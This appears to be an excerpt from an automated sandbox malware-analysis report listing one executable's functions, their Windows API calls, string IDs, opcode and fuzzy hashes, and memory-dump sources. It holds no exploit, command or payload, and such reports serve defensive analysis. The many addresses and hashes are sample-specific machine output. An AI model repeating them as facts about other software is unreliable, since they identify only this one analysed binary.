                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                                  • String ID: edit
                                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                                  • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                  • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                                                                                                  • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                  • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                                                                                                  Function 004629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462A22
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                  • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                  • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                                                                                                  • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                  • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                                                                                                  Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                  • String ID: <local>
                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                  • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                  • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                                                                                                  • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                  • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                                                                                                  Function 0041092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  • _wcscat.LIBCMT ref: 00444CB7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                  • String ID: SL
                                                                                                                                                  • API String ID: 257928180-181245872
                                                                                                                                                  • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                  • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                                                                                                  • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                  • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                                                                                                  Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                                                                                  • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                                                                                                  • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                                                                                  • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                                                                                                  Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                                                                                  • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                                                                                                  • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                                                                                  • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                                                                                                  Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                                                                                  • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                                                                                                  • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                                                                                  • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                                                                                                  Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                                                                                    • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                                                                                    • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                                                                                    • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                                                  • String ID: d}K
                                                                                                                                                  • API String ID: 2932060187-3405784397
                                                                                                                                                  • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                  • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                                                                                                  • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                  • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                                                                                                  Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                                  • String ID: #32770
                                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                                  • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                  • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                                                                                                  • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                  • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                                                                                                  Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                                                                                    • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                                                                                  Strings
                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                  • API String ID: 3158253471-631824599
                                                                                                                                                  • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                  • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                                                                                  • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                  • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9